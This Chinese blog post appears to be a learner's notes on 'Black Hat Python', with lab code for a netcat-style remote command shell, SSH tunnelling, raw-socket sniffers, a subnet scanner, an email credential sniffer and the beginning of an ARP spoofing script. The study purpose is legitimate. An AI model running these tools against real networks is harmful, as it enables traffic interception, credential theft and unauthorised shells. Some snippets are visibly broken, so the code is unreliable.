剑西楼

Python 编程精选

↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑为了方便查找，请看目录（手机端就没有目录哦）

注：本文篇幅较大，请耐心等待（power by 《Python黑帽子:黑客与渗透测试编程之道》）

终于学完了，也敲完代码了，其中有好几个都没成功实践出作者的预期结果，知道我哪里错的，欢迎指点。

最后感谢用户 mackf qq_31229763 的鼓励

全部代码下载(github)：我手敲的代码，中文注释(还添加了自己的注释)，也有作者提供的源码，不过作者的不完整,我的还包含了字典什么的[这是个超链接]

第一章设置Python环境

kali虚拟机

开始用pip安装github3.py，没什么问题

跟着安装WingIDE，下载Linux对应位数的版本的deb，就行了，但是产生了依赖

于是修改软件源APT-sources.list

vim /etc/apt/sources.list

将原来的注释掉，加了个阿里的

#阿里云kali源

deb http://mirrors.aliyun.com/kali sana main non-free contrib

deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

再

apt-get update & apt-get upgrade

apt-get -f install

最后再安装deb文件就行了，命令如上面截图

因为wingide收费版才有自动补全，那就用有现成序列号的pycharm4.5吧~~，没补全真难受

第二章网络基础

TCP客户端

可以看到百度返回的HTTP响应啦

UDP客户端

首先先用nc监听一下9999端口，-u就是udp模式的啦，哈哈发过去了，最后打印出了ip和端口，nc没发数据过来，可能就没收到数据咯

现在就可以比较一下tcp和udp的区别了，最核心的是udp不用连接，因为是无状态的协议

发送和接受的函数也是有区别的，通过实验发现recv和recvfrom的参数是接收几个字符的意思

TCP服务器

[python]  view plain  copy 
      
     
 #-*- coding:utf8 -*-  
 import  socket  
 import threading  
   
 bind_ip = "0.0.0.0"     #绑定ip：这里代表任何ip地址  
 bind_port = 8888  
   
 server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
   
 server.bind((bind_ip, bind_port))  
 # 最大连接数为5  
 server.listen(5)  
   
 print "[*] Listening on %s:%d" % (bind_ip, bind_port)  
   
 # 这是客户处理进程  
 def handle_client(client_socket):  
     #打印出客户端发送得到的内容  
     request = client_socket.recv(1024)  
   
     print "[*] Received: %s" % request  
   
     #发送一个数据包  
     client_socket.send("ACK!")  
     client_socket.close()  
   
   
 while True:  
     client,addr = server.accept()  
   
     print "[*] Accepted connection from: %s:%d" % (addr[0], addr[1])  
   
     #挂起客户端线程，处理传人的数据  
     client_handler = threading.Thread(target=handle_client, args=(client,))  
     client_handler.start()  

用之前的tcp客户端连接，收到信息了

同时，服务端也收到了客户端发来的信息

取代netcat

代码：

[python]  view plain  copy 
      
     
 #!/usr/bin/python  
 #-*- coding:utf8 -*-  
 import sys  
 import socket  
 import getopt  
 import threading  
 import subprocess  
   
 # 定义一些全局变量  
 listen = False  
 command = False  
 upload = False  
 execute = ""  
 target = ""  
 upload_destination = ""  
 port = 0  
   
 def run_command(command):  
   
     # 删除字符串末尾的空格  
     command = command.rstrip()  
     # 运行命令并将输出放回  
     try:  
         output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)  
     except:  
         output = "Failed to execute command.\r\n"  
     # 将输出发送  
     return output  
   
   
 def client_handler(client_socket):  
     global upload  
     global execute  
     global command  
   
     # 检查上传文件  
     if len(upload_destination):  
         # 读取所有的字符并写下目标  
         file_buffer = ""  
         # 持续读取数据直到没有符合的数据  
         while True:  
             data = client_socket.recv(1024)  
   
             if not data:  
                 break  
             else:  
                 file_buffer += data  
   
         try:  
             file_descriptor = open(upload_destination, "wb")  
             file_descriptor.write(file_buffer)  
             file_descriptor.close()  
   
             client_socket.send("Successfully saved file to %s\r\n" % upload_destination)  
         except:  
             client_socket.send("Failed to save file to %s\r\n" % upload_destination)  
   
     # 检查命令执行  
     if len(execute):  
         # 运行命令  
         output = run_command(execute)  
         client_socket.send(output)  
   
   
     # 如果需要一个命令行shell,那么我们进入另一个循环  
     if command:  
         while True:  
             # 跳出一个窗口  
             client_socket.send("")  
   
             cmd_buffer = ""  
             while "\n" not in cmd_buffer:  
                 cmd_buffer += client_socket.recv(1024)  
             #  返回命令输出  
             response = run_command(cmd_buffer)  
             # 返回响应数据  
             client_socket.send(response)  
   
 def server_loop():  
     global target  
   
     # 如果没有定义目标,那我们监听所有接口  
     if not len(target):  
         target = "0.0.0.0"  
   
     server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
     server.bind((target, port))  
   
     server.listen(5)  
   
     while True:  
         client_socket, addr = server.accept()  
         # 分拆一个线程处理新的客户端  
         client_thread = threading.Thread(target=client_handler, args=(client_socket,))  
         client_thread.start()  
   
 def client_sender(buffer):  
     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
   
     try:  
         # 连接到目标主机  
         client.connect((target, port))  
   
         if len(buffer):  
             client.send(buffer)  
   
         while True:  
             # 现在等待数据回传  
             recv_len = 1  
             response = ""  
   
             while recv_len:  
                 data = client.recv(4096)  
                 recv_len = len(data)  
                 response += data  
   
                 if recv_len < 4096:  
                     break  
   
             print  response  
   
             # 等待更多的输入  
             buffer = raw_input("")  
             buffer += "\n"  
   
             # 发送出去  
             client.send(buffer)  
   
     except:  
         print "[*] Exception! Exiting."  
   
     #关闭连接  
     client.close()  
   
 def usage():  
     print "BHP Net Tool"  
     print  
     print "Usage: bhpnet.py -t target_host - p port"  
     print "-l --listen              - listen on [host]:[port] for incoming connections"  
     print "-e --execute=file_to_run -execute the given file upon receiving a connection"  
     print "-c --command             - initialize a commandshell"  
     print "-u --upload=destination  - upon receiving connection upload a file and write to [destination]"  
     print  
     print  
     print "Examples:"  
     print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"  
     print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"  
     print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""  
     print "echo 'ABCDEFGHI' | python ./bhpnet.py -t 192.168.11.12 -p 135"  
     sys.exit(0)  
   
 def main():  
     global listen  
     global port  
     global execute  
     global command  
     global upload_destination  
     global target  
   
     if not  len(sys.argv[1:]):  
         usage()  
   
   
     # 读取命令行选项,若没有该选项则显示用法  
     try:  
         opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",["help", "listen", "execute", "target", "port", "command", "upload"])  
     except getopt.GetoptError as err:  
         print str(err)  
         usage()  
   
   
     for o,a in opts:  
         if o in ("-h","--help"):  
             usage()  
         elif o in ("-l", "--listen"):  
             listen = True  
         elif o in ("-e", "--execute"):  
             execute = a  
         elif o in ("-c", "--commandshell"):  
             command = True  
         elif o in ("-u", "--upload"):  
             upload_destination = a  
         elif o in ("-t", "--target"):  
             target = a  
         elif o in ("-p", "--port"):  
             port = int(a)  
         else:  
             assert False,"Unhandled Option"  
   
     #我们是进行监听还是仅从标准输入读取数据并发送数据？  
     if not listen and len(target) and port > 0:  
   
         # 从命令行读取内存数据  
         # 这里将阻塞,所以不再向标准输入发送数据时发送CTRL-D  
         buffer = sys.stdin.read()  
   
         # 发送数据  
         client_sender(buffer)  
   
     # 我们开始监听并准备上传文件,执行命令  
     # 放置一个反弹shell  
     # 取决于上面的命令行选项  
     if listen:  
         server_loop()  
   
 #调用main函数  
 main()  

一开始没在前头打python，默认是不是用python解析运行的，所以会出错，kali就会变成截图了

下面的客户端连接时，连接后要按CTRL+D让其返回shell

如果你不想每次都打python才能运行，就在第一行加入#!/usr/bin/python（如果python默认安装在那个目录的话）

创建一个TCP代理

用法: ./文件名.py [localhost] [localport] [remotehost] [remoteport] [receive_first] //最后一个参数是是否从远程服务器（主机）接收数据

可以看到这个是监听本地的80端口，远程主机就是百度的域名，也是80端口，那么我们将代理设置为127.0.0.1 80的话，其实我们只能访问百度，因为开代理时已决定了你要访问的域名（主机），具体看下图

设置完代理，再打开百度，我们在下图可看到GET请求的全部内容，这确实比我们直接访问百度多了一跳。

过程如下：

浏览器将GET请求发送给本地的80端口，又我们的程序监听的是本地的80端口，就会将GET请求发送给远程主机（即我们开启程序时设置的www.baidu.com的80端口），最后再将www.baidu.com返回的数据给回程序，再给回浏览器（那为什么我们访问其他网址或ip不能呢，就是你发送的GET请求给www.baidu.com他会返回你要的网址的内容给你么，那当然不会，所以就只能访问百度域名下的各种目录）

还有返回的响应数据，其实我觉得这好像在抓包了

通过Paramiko使用SSH

首先安装paramiko模块，还是去了点小问题，好像是安装过了吧，要我升级一下？

代码（这里也是可以用密钥认证来登陆的，这里就注释掉了）

可以看到跟我直接用xshell 连接自己的树莓派执行的结果是一致的。

反向ssh

为了适应非默认端口，改了一下作者的客户端代码，修改处已圈出

可能是什么权限什么的，认证成功，最后连接不成功

在kali测试还是一样~~，有谁告诉我原因，我只有那个私钥和作者不一样啊~~~

ssh隧道

建议看一下这篇文章，你会对ssh隧道的理解更直观，我的理解简单来说就是一条管道，其实别人说隧道也觉得差不多啦

http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html

在本地用locate命令找不到paramiko的示例文件rforward.py，最终通过谷歌终于找到了，原来在github上：https://github.com/paramiko/paramiko/tree/master/demos，之前那个test_rsa.key文件也在上面了

一开始将我的树莓派（192.168.88.102）作为ssh客户端，端口为5556,，与kali（10.10.10.145:6666）建立一个反向ssh隧道

在服务端kaili执行

[python]  view plain  copy 
      
 python rforward.py 192.168.88.102 -p 5556  -r 10.10.10.145:6666  --user pi --password

跟着kali端

[python]  view plain  copy 
      
 nc -l 6666

但在树莓派执行

[python]  view plain  copy 
      
 nc 127.0.0.1 5556

并不能连接，出错了（说是拒绝），详见下图最后一行

于是就尝试kali的22端口

[python]  view plain  copy 
      
 python rforward.py 192.168.88.102 -p 5556  -r 10.10.10.145:22  --user pi --password

可以看到成功了，而且隧道建立后树莓派那边（客户端）的127.0.0.1:5556处于监听状态，我们发送到本地5556的请求会转发到10.10.10.145的22端口啦~~

第三章网络：原始套接字和流量嗅探

Windows和Linux上的包嗅探

[python]  view plain  copy 
      
 #-*- coding:utf8 -*-  
   
 import socket  
 import os  
   
 # 监听主机，即监听那个网络接口，下面的为我的kali的ip  
 host = "10.10.10.145"  
   
 # 创建原始套接字,然后绑定在公开接口上  
 if  os.name == "nt":  
     socket_protocol = socket.IPPROTO_IP  
 else:  
     socket_protocol = socket.IPPROTO_ICMP  
   
 sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)   #raw的中文是生的意思,大概就是原始套接字的意思吧  
   
 sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~  
   
 # 设置在捕获的数据包中包含IP头  
 sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  
   
 # 在Windows平台上,我们需要设置IOCTL以启用混杂模式  
 if os.name == "nt":  
     sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_NO)  
   
 # 读取单个数据包  
 print sniffer.recvfrom(65565)  
   
 # 在Windows平台上关闭混杂模式  
 if os.name == "nt":  
     sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

运行结果：可以看到成功抓取到了ping的包，虽然前面的看不懂，但最后的ip机看得懂了

解码IP层

[python]  view plain  copy 
      
     
 #-*- coding:utf8 -*-  
   
 import socket  
 import os  
 import struct  
 from ctypes import *  
   
 # 监听主机，即监听那个网络接口，下面的ip为我的kali的ip  
 host = "10.10.10.145"  
   
 # ip头定义  
 class IP(Structure):  
     _fields_ = [  
         ("ihl",             c_ubyte, 4),    #ip head length:头长度  
         ("version",         c_ubyte, 4),    #版本  
         ("tos",             c_ubyte),       #服务类型  
         ("len",             c_ushort),      #ip数据包总长度  
         ("id",              c_ushort),       #标识符  
         ("offset",          c_ushort),      #片偏移  
         ("ttl",             c_ubyte),       #生存时间  
         ("protocol_num",    c_ubyte),       #协议数字,应该是协议类型,这里用数字来代表时哪个协议,下面构造函数有设置映射表  
         ("sum",             c_ushort),      #头部校验和  
         ("src",             c_ulong),       #源ip地址  
         ("dst",             c_ulong)        #目的ip地址  
     ]  
   
     # __new__(cls, *args, **kwargs)  创建对象时调用，返回当前对象的一个实例;注意：这里的第一个参数是cls即class本身  
     def __new__(self, socket_buffer=None):  
         return  self.from_buffer_copy(socket_buffer)  
   
     # __init__(self, *args, **kwargs) 创建完对象后调用，对当前对象的实例的一些初始化，无返回值,即在调用__new__之后，根据返回的实例初始化；注意，这里的第一个参数是self即对象本身【注意和new的区别】  
     def __init__(self, socket_buffer=None):  
         # 协议字段与协议名称的对应  
         self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}  
   
         # 可读性更强的ip地址(转换32位打包的IPV4地址为IP地址的标准点号分隔字符串表示。)  
         self.src_address = socket.inet_ntoa(struct.pack(", self.src))  
         self.dst_address = socket.inet_ntoa(struct.pack(", self.dst))  
   
         # 协议类型  
         try:  
             self.protocol = self.protocol_map[self.protocol_num]  
         except:  
             self.protocol = str(self.protocol_num)  
   
   
   
 if  os.name == "nt":  
     socket_protocol = socket.IPPROTO_IP  
 else:  
     socket_protocol = socket.IPPROTO_ICMP  
   
 sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)   #raw的中文是生的意思,大概就是原始套接字的意思吧  
   
 sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~  
   
 # 设置在捕获的数据包中包含IP头  
 sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  
   
 # 在Windows平台上,我们需要设置IOCTL以启用混杂模式  
 if os.name == "nt":  
     sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)  
 try:  
     while True:  
         # 读取数据包  
         raw_buffer =  sniffer.recvfrom(65565)[0]  
   
         # 将缓冲区的前20个字节按IP头进行解析  
         ip_header = IP(raw_buffer[0:20])  
   
         # 输出协议和通信双方IP地址  
         print  "Protocol: %s %s ->  %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)  
   
 # 处理CTRL-C  
 except  KeyboardInterrupt:  
   
     # 如果运行再Windows上,关闭混杂模式  
     if os.name == "nt":  
         sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)  

在windows 7运行结果，我开的软件比较多，抓取数据速度还是很快

但在kali就又出问题了，不知道为什么，20改成32也不行，因为解析是按20字节解析的

放到我的树莓派去试试吧~，一开始没用sudo，应该是原始套接字需要较高权限，毕竟比较底层的东西

跟着呢就ping了两下百度，也抓取到了，ip是没错的，linux只能抓icmp的，所以只能看到这两条了，不然还能看到树莓派其他软件的网络数据流量

解码ICMP

这是一个完整的ICMP类型的列表：从百科复制过来的，以便于分析

type=3且code=3就说明主机存在，因为发送UDP数据到关闭的端口会产生type=3且code=3的ICMP包，如果不存在这样的主机他是不会回复的

TYPE	CODE	Description	Query	Error
0	0	Echo Reply——回显应答（Ping应答）	x
3	0	Network Unreachable——网络不可达		x
3	1	Host Unreachable——主机不可达		x
3	2	Protocol Unreachable——协议不可达		x
3	3	Port Unreachable——端口不可达		x
3	4	Fragmentation needed but no frag. bit set——需要进行分片但设置不分片比特		x
3	5	Source routing failed——源站选路失败		x
3	6	Destination network unknown——目的网络未知		x
3	7	Destination host unknown——目的主机未知		x
3	8	Source host isolated (obsolete)——源主机被隔离（作废不用）		x
3	9	Destination network administratively prohibited——目的网络被强制禁止		x
3	10	Destination host administratively prohibited——目的主机被强制禁止		x
3	11	Network unreachable for TOS——由于服务类型TOS，网络不可达		x
3	12	Host unreachable for TOS——由于服务类型TOS，主机不可达		x
3	13	Communication administratively prohibited by filtering——由于过滤，通信被强制禁止		x
3	14	Host precedence violation——主机越权		x
3	15	Precedence cutoff in effect——优先中止生效		x
4	0	Source quench——源端被关闭（基本流控制）
5	0	Redirect for network——对网络重定向
5	1	Redirect for host——对主机重定向
5	2	Redirect for TOS and network——对服务类型和网络重定向
5	3	Redirect for TOS and host——对服务类型和主机重定向
8	0	Echo request——回显请求（Ping请求）	x
9	0	Router advertisement——路由器通告
10	0	Route solicitation——路由器请求
11	0	TTL equals 0 during transit——传输期间生存时间为0		x
11	1	TTL equals 0 during reassembly——在数据报组装期间生存时间为0		x
12	0	IP header bad (catchall error)——坏的IP首部（包括各种差错）		x
12	1	Required options missing——缺少必需的选项		x
13	0	Timestamp request (obsolete)——时间戳请求（作废不用）	x
14		Timestamp reply (obsolete)——时间戳应答（作废不用）	x
15	0	Information request (obsolete)——信息请求（作废不用）	x
16	0	Information reply (obsolete)——信息应答（作废不用）	x
17	0	Address mask request——地址掩码请求	x
18	0	Address mask reply——地址掩码应答

[python]  view plain  copy 
      
     
 #-*- coding:utf8 -*-  
   
 import socket  
 import os  
 import struct  
 from ctypes import *  
   
 # 监听主机，即监听那个网络接口，下面的ip为我的kali的ip  
 host = "10.10.10.145"  
   
 # ip头定义  
 class IP(Structure):  
     _fields_ = [  
         ("ihl",             c_ubyte, 4),    #ip head length:头长度  
         ("version",         c_ubyte, 4),    #版本  
         ("tos",             c_ubyte),       #服务类型  
         ("len",             c_ushort),      #ip数据包总长度  
         ("id",              c_ushort),       #标识符  
         ("offset",          c_ushort),      #片偏移  
         ("ttl",             c_ubyte),       #生存时间  
         ("protocol_num",    c_ubyte),       #协议数字,应该是协议类型,这里用数字来代表时哪个协议,下面构造函数有设置映射表  
         ("sum",             c_ushort),      #头部校验和  
         ("src",             c_ulong),       #源ip地址  
         ("dst",             c_ulong)        #目的ip地址  
     ]  
   
     # __new__(cls, *args, **kwargs)  创建对象时调用，返回当前对象的一个实例;注意：这里的第一个参数是cls即class本身  
     def __new__(self, socket_buffer=None):  
         return  self.from_buffer_copy(socket_buffer)  
   
     # __init__(self, *args, **kwargs) 创建完对象后调用，对当前对象的实例的一些初始化，无返回值,即在调用__new__之后，根据返回的实例初始化；注意，这里的第一个参数是self即对象本身【注意和new的区别】  
     def __init__(self, socket_buffer=None):  
         # 协议字段与协议名称的对应  
         self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}  
   
         # 可读性更强的ip地址(转换32位打包的IPV4地址为IP地址的标准点号分隔字符串表示。)  
         self.src_address = socket.inet_ntoa(struct.pack(", self.src))  
         self.dst_address = socket.inet_ntoa(struct.pack(", self.dst))  
   
         # 协议类型  
         try:  
             self.protocol = self.protocol_map[self.protocol_num]  
         except:  
             self.protocol = str(self.protocol_num)  
   
   
 class ICMP(Structure):  
     #  
     _fields_ = [  
         ("type",            c_ubyte),       #类型  
         ("code",            c_ubyte),       #代码值  
         ("checksum",        c_ubyte),       #头部校验和  
         ("unused",          c_ubyte),       #未使用  
         ("next_hop_mtu",    c_ubyte)        #下一跳的MTU  
     ]  
   
     def __new__(self, socket_buffer):  
         return self.from_buffer_copy(socket_buffer)  
   
     def __init__(self, socket_buffer):  
         pass  
   
   
 if  os.name == "nt":  
     socket_protocol = socket.IPPROTO_IP  
 else:  
     socket_protocol = socket.IPPROTO_ICMP  
   
 sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)   #raw的中文是生的意思,大概就是原始套接字的意思吧  
   
 sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~  
   
 # 设置在捕获的数据包中包含IP头  
 sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  
   
 # 在Windows平台上,我们需要设置IOCTL以启用混杂模式  
 if os.name == "nt":  
     sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)  
   
 try:  
     while True:  
         # 读取数据包  
         raw_buffer =  sniffer.recvfrom(65565)[0]  
   
         # 将缓冲区的前20个字节按IP头进行解析  
         ip_header = IP(raw_buffer[0:20])  
   
         # 输出协议和通信双方IP地址  
         print  "Protocol: %s %s ->  %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)  
   
         # 如果为ICMP,进行处理  
         if ip_header.protocol == "ICMP":  
   
             # 计算ICMP包的起始位置,并获取ICMP包的数据  
             offset = ip_header.ihl * 4      #ihl是头部长度,代表32位(即4字节)长的分片的个数 [我的理解是因为一个字节表示一个符号,所以这里的offset要搞成以字节为单位的,为的是下一句的提取数据]  
             buf = raw_buffer[offset:offset+sizeof(ICMP)]  
   
             # 解析ICMP数据  
             icmp_header = ICMP(buf)  
   
             print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code)  
   
 # 处理CTRL-C  
 except  KeyboardInterrupt:  
   
     # 如果运行再Windows上,关闭混杂模式  
     if os.name == "nt":  
         sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)  

下面看看ping通的情况看上表，可看出是一个ping请求，一个ping应答

udp主机存活扫描器

首先要安装netaddr第三方库，这个处理IP非常方便

[python]  view plain  copy 
      
 easy_install netaddr

如果没有这个命令，就要可能下载配置咯，具体百度，谷歌吧~

代码如下，改了一句作者的代码，让要扫描的目标网络接收命令行参数，默认就192.168.1.0/24

[python]  view plain  copy 
      
     
 #-*- coding:utf8 -*-  
   
 import socket  
 import os  
 import struct  
 import threading  
 import time  
 import sys  
 from netaddr import IPNetwork,IPAddress  
 from ctypes import *  
   
 # 监听主机，即监听那个网络接口，下面的ip为我的kali的ip  
 host = "10.10.10.145"  
   
 # 扫描的目标子网  
 # subnet = "192.168.1.0/24"  
 # 没有命令行参数,默认192.168.1.0/24  
 if len(sys.argv) == 1:  
     subnet = "192.168.1.0/24"  
 else:  
     subnet = sys.argv[1]  
   
 # 自定义的字符串,我们将在ICMP响应中进行核对  
 magic_message = "PYTHONRULES!"  
   
 # 批量发送UDP数据包  
 def udp_sender(subnet, magic_message):  
     time.sleep(5)   #可以说程序暂停5秒吧  
     # 建立一个socket对象(SOCK_DGRAM:UDP客户端)  
     sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
   
     for ip in IPNetwork(subnet):  
         try:  
             # 尝试发送magic_message这个消息到子网的每个ip,还用了个不怎么可能用的65212端口  
             sender.sendto(magic_message, ("%s" % ip, 65212))  
         except:  
             pass    #代表什么也不做  
   
 # ip头定义  
 class IP(Structure):  
     _fields_ = [  
         ("ihl",             c_ubyte, 4),    #ip head length:头长度  
         ("version",         c_ubyte, 4),    #版本  
         ("tos",             c_ubyte),       #服务类型  
         ("len",             c_ushort),      #ip数据包总长度  
         ("id",              c_ushort),       #标识符  
         ("offset",          c_ushort),      #片偏移  
         ("ttl",             c_ubyte),       #生存时间  
         ("protocol_num",    c_ubyte),       #协议数字,应该是协议类型,这里用数字来代表时哪个协议,下面构造函数有设置映射表  
         ("sum",             c_ushort),      #头部校验和  
         ("src",             c_ulong),       #源ip地址  
         ("dst",             c_ulong)        #目的ip地址  
     ]  
   
     # __new__(cls, *args, **kwargs)  创建对象时调用，返回当前对象的一个实例;注意：这里的第一个参数是cls即class本身  
     def __new__(self, socket_buffer=None):  
         return  self.from_buffer_copy(socket_buffer)  
   
     # __init__(self, *args, **kwargs) 创建完对象后调用，对当前对象的实例的一些初始化，无返回值,即在调用__new__之后，根据返回的实例初始化；注意，这里的第一个参数是self即对象本身【注意和new的区别】  
     def __init__(self, socket_buffer=None):  
         # 协议字段与协议名称的对应  
         self.protocol_map = {1:"ICMP", 6:"TCP", 17:"UDP"}  
   
         # 可读性更强的ip地址(转换32位打包的IPV4地址为IP地址的标准点号分隔字符串表示。)  
         self.src_address = socket.inet_ntoa(struct.pack(", self.src))  
         self.dst_address = socket.inet_ntoa(struct.pack(", self.dst))  
   
         # 协议类型  
         try:  
             self.protocol = self.protocol_map[self.protocol_num]  
         except:  
             self.protocol = str(self.protocol_num)  
   
   
 class ICMP(Structure):  
     #  
     _fields_ = [  
         ("type",            c_ubyte),       #类型  
         ("code",            c_ubyte),       #代码值  
         ("checksum",        c_ubyte),       #头部校验和  
         ("unused",          c_ubyte),       #未使用  
         ("next_hop_mtu",    c_ubyte)        #下一跳的MTU  
     ]  
   
     def __new__(self, socket_buffer):  
         return self.from_buffer_copy(socket_buffer)  
   
     def __init__(self, socket_buffer):  
         pass  
   
   
 if  os.name == "nt":  
     socket_protocol = socket.IPPROTO_IP  
 else:  
     socket_protocol = socket.IPPROTO_ICMP  
   
 sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)   #raw的中文是生的意思,大概就是原始套接字的意思吧  
   
 sniffer.bind((host, 0)) #这里端口为0,监听所有端口吧~  
   
 # 设置在捕获的数据包中包含IP头  
 sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  
   
 # 在Windows平台上,我们需要设置IOCTL以启用混杂模式  
 if os.name == "nt":  
     sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)  
   
 # 开启多线程发送udp数据包  
 t = threading.Thread(target=udp_sender, args=(subnet, magic_message))  
 t.start()  
   
 try:  
     while True:  
         # 读取数据包  
         raw_buffer =  sniffer.recvfrom(65565)[0]  
   
         # 将缓冲区的前20个字节按IP头进行解析  
         ip_header = IP(raw_buffer[0:20])  
   
         # 输出协议和通信双方IP地址  
         #print  "Protocol: %s %s ->  %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)  
   
         # 如果为ICMP,进行处理  
         if ip_header.protocol == "ICMP":  
   
             # 计算ICMP包的起始位置,并获取ICMP包的数据  
             offset = ip_header.ihl * 4      #ihl是头部长度,代表32位(即4字节)长的分片的个数 [我的理解是因为一个字节表示一个符号,所以这里的offset要搞成以字节为单位的,为的是下一句的提取数据]  
             buf = raw_buffer[offset:offset+sizeof(ICMP)]  
   
             # 解析ICMP数据  
             icmp_header = ICMP(buf)  
   
             #print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code)  
   
             # 检查类型和代码值是否都为3  
             if icmp_header.type == 3 and icmp_header.code == 3:  
                 # 确认响应的主机再我们的目标子网之内  
                 if IPAddress(ip_header.src_address) in IPNetwork(subnet):  
                     # 确认ICMP包中包含我们发送的自定义的字符串  
                     if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message:  
                         print "Host Up: %s" % ip_header.src_address  
   
   
   
 # 处理CTRL-C  
 except  KeyboardInterrupt:  
   
     # 如果运行再Windows上,关闭混杂模式  
     if os.name == "nt":  
         sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)  

运行结果：

跟我手机的fing扫描的相比，少了我的手机的ip和另外一个我同学的手机，难道小米有防护？应该只能扫电脑了

值得肯定的是，跟360防蹭网的结果是一样的，说明360的估计方法用的差不多，详细见下一张图的下一张

fing还是挺强大的，能识别主流设备，如树莓派，小米手机等，详细见下图

再测试一下其他网段，通过浏览器打开的测试，有些还是web服务器呢，不过下图的是安装完apache的centos，还没部署代码

第四章 Scapy：网络的掌控者

scapy的安装

首先当然要安装scapy，直接给下载网址

https://codeload.github.com/secdev/scapy/zip/v2.3.2

官网也给下，因为可能有更新什么的

http://www.secdev.org/projects/scapy/

在kali的安装步骤

[python]  view plain  copy 
       
      
 unzip scapy-2.3.2.zip  
 cd scapy-2.3.2  
 ./setup.py install  

scapy简单嗅探初探

有个函数说一下

[python]  view plain  copy 
        
 sniff(filter="",iface="any",prn=function,count=N)

filter跟wireshark的过滤类型一样

iface：就是要嗅探的网卡

prn：就是回调函数，简单理解就是会自动调用，它以收到的数据包对象作为唯一参数，你可以在函数中处理数据包

count：嗅探的个数，留空就为无限个

代码：

[python]  view plain  copy 
        
       
 #-*- coding:utf8 -*-  
   
 from scapy.all import *  
   
 # 定义数据包回调函数  
 def packet_callback(packet):  
     print packet.show()  
   
 # 开启嗅探器  
 sniff(prn=packet_callback, count=1)  

结果：可以看到从以太网协议，ip协议到tcp协议和数据部分都有了，确实很方便

窃取email认证

[python]  view plain  copy 
      
     
 #-*- coding:utf8 -*-  
   
 from scapy.all import *  
   
 # 定义数据包回调函数  
 def packet_callback(packet):  
   
     if packet[TCP].payload:  
         mail_packet = str(packet[TCP].payload)  
         if "user" in mail_packet.lower() or "pass" in mail_packet.lower():  
   
             print "[*] Server: %s" % packet[IP].dst  
             print "[*] %s" % packet[TCP].payload  
     # print packet.show()  
   
 # 开启嗅探器(对常见电子邮件端口进行嗅探１１０（ＰＯＰ３），　２５（ＳＭＴＰ），　１４３（ＩＭＡＰ), store=0:不保留原始数据包，长时间嗅探的话不会暂用太多内存  
 sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)  

这里我用命令行模拟邮件登陆（当然我用的是错误的用户名和密码，所以下图是不能登录成功的，但已经说明抓取成功）

我这里以登陆网易的pop3服务器为例（用telnet即可）

利用Scapy进行ARP缓存投毒

------------------------------------------------------------这个就是我们通常所说的ARP欺骗咯

首先要开启对网关和目标ip地址的流量进行转发的功能

[python]  view plain  copy 
       
 echo 1 > /proc/sys/net/ipv4/ip_forward

[python]  view plain  copy 
       
      
 #-*- coding:utf8 -*-  
   
 from scapy.all import *  
 import os  
 import sys  
 import threading  
 import signal  
   
 interface   = "eth0"    #要嗅探的网卡  
 target_ip   = "10.10.10.140"        #目标ip,这里测试的是另外一台虚拟机winxp  
 gateway_ip  = "10.10.10.2"        #网关ip，这里是虚拟机的网关  
 packet_count = 1000  
   
 def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):  
   
     # 以下代码调用send函数的方式稍有不同  
     print "[*] Restoring target..."  
     send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)  
     send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)  
   
     # 发出退出信号到主线程  
     os.kill(os.getpid(), signal.SIGINT)  
   
 def get_mac(ip_address):  
   
     # srp函数（发送和接收数据包，发送指定ARP请求到指定IP地址,然后从返回的数据中获取目标ip的mac）  
     responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address), timeout=2, retry=10)  
     #　返回从响应数据中获取的MAC地址  
     for s,r in responses:  
         return r[Ether].src  
     return None  
   
